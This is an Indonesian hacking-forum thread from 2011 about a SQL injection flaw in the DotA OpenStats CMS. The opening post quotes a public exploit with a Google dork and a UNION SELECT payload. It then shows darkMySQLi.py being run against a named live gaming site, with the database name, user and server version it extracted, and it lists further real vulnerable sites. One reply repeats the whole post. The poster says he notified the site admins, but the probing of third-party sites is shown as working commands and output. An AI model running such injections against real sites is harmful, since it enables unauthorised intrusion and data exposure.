BUG di situs cms DOTA ..

**cassaprodigy** · 12-24-2011, 05:41 PM

awalnya saya main2 ke db-exploit.. ketemu ama exploit temuan anak-anak bangsa ..

Quote:=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit

http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

============
Made IN INDONESIA
Greetz for All HVM crew
============

kyknya ini situs dota gitu Tongue

langsung saya coba di salah satu situs yg menggunakan vendor cms tersebut ,..

Code:
http://rank.battlenet.web.id/index.php?id=

yup langsung error mysql nampak

sesuai dengan exploitna .. sy temukan 4 colom .. sy coba pake d4rkMySQLi.py ...

Code:

cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol



|--------------------------------------------------|

| [email protected]                         v1.6   |

|   1/2009      darkMySQLi.py                      |

|     -- Multi Purpose MySQL Injection Tool --     |

| Usage: darkMySQLi.py [options]                   |

|                      -h help       darkc0de.com  |

|--------------------------------------------------|



[+] URL: http://rank.battlenet.web.id/index.php?id=1

[+] 16:03:44

[+] Evasion: + --

[+] Cookie: None

[+] SSL: No

[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 1,2,3,4,

[+] Column Length is: 4

[+] Found null column at column #: 1,2,3,



[!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4--

[!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--

penulusuran lebih jauh ternyata makin tajam ...

Code:

[+] Gathering MySQL Server Configuration...

    Database: battlene_bot-godlike

    User: [email protected]

    Version: 5.0.92-community-log

sudah saya pm adminnya mudah2an di patch .. karena lebay.web.id setahu ane situs game lumayan terkenal ..

masih ada lagi .. tolong admin di pm ..

http://www.eliteguild.net/rank/index.php?id=
http://www.azuza.web.id/index.php?id=
http://bot.dota.web.id:8000/sexy/index.php?id=

rata-rata situs indo.. masih banyak lagi situs dengan hole yang sama... hikz ..

**RieqyNS13** · 12-24-2011, 07:43 PM

wah, baik banget om, mw ngasih tw admin nya,, biasanya klo grup2 underground di fb, malah nanti index nya di deface om..

**cassaprodigy** · 12-24-2011, 11:50 PM

hehehe beda bro.... di sini dilarang ngedeface Tongue

.. kalu bisa di bantu adminnya biar patch ...khusus untuk indonesia saja

**bekti** · 12-25-2011, 12:51 AM

semangat membangun Smile

**kr1355** · 12-26-2011, 12:31 AM

(12-24-2011, 05:41 PM)cassaprodigy Wrote: awalnya saya main2 ke db-exploit.. ketemu ama exploit temuan anak-anak bangsa ..

Quote:=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit

http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

============
Made IN INDONESIA
Greetz for All HVM crew
============

kyknya ini situs dota gitu

langsung saya coba di salah satu situs yg menggunakan vendor cms tersebut ,..

Code:
http://rank.battlenet.web.id/index.php?id=

yup langsung error mysql nampak

sesuai dengan exploitna .. sy temukan 4 colom .. sy coba pake d4rkMySQLi.py ...

Code:
cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol |--------------------------------------------------| | [email protected] v1.6 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://rank.battlenet.web.id/index.php?id=1 [+] 16:03:44 [+] Evasion: + -- [+] Cookie: None [+] SSL: No [+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95) [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 1,2,3,4, [+] Column Length is: 4 [+] Found null column at column #: 1,2,3, [!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4-- [!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--

penulusuran lebih jauh ternyata makin tajam ...

Code:
[+] Gathering MySQL Server Configuration... Database: battlene_bot-godlike User: [email protected] Version: 5.0.92-community-log

sudah saya pm adminnya mudah2an di patch .. karena lebay.web.id setahu ane situs game lumayan terkenal ..

masih ada lagi .. tolong admin di pm ..

http://www.eliteguild.net/rank/index.php?id=
http://www.azuza.web.id/index.php?id=
http://bot.dota.web.id:8000/sexy/index.php?id=

rata-rata situs indo.. masih banyak lagi situs dengan hole yang sama... hikz ..

biar maju IT di indonesia.
jayalah terus IT indonesia.
Smile